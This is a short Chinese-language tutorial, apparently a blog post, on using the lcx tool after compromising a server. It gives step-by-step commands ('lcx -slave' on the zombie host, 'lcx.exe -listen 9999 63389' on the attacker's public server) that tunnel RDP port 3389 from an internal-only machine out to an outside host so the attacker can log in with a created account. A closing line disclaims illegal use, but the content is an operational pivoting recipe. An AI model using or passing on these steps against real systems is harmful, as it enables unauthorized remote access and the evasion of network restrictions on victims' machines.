0x00 简单介绍
lcx是一款使用频率相对较高的一款工具,主要用来进行端口的转发,lcx工作原理是使不同端口之间形成一个环路,这样就可以进行端口转发。
0x01 使用场景
拿到权限后,内网3389端口未开启外连,只允许内网访问,此时可以利用lcx进行突破,将流量转发到公网的端口上。
0x02 简单演示
1、权限很高,system权限,在拿下某台服务器时发现其3389端口开放,但并不允许外连。
2、上传lcx到可读写目录,然后执行lcx -slave 公网ip 公网端口 肉鸡内网地址 肉鸡远程端口(默认3389)
3、执行后可以使用netstat -ano|findstr 9999 查看是否成功,这里使用的是9999端口,可以看到执行成功。
4、此时登录你的公网服务器,然后本地监听并转发到别的端口即可lcx.exe -listen 9999 63389
5、然后远程连接自己的公网服务器ip 63389端口,用创建的用户登录即可
好了,今天的分享就到这里,大佬勿喷。
本教程仅用来交流研究,请勿非法测试,否则后果自负。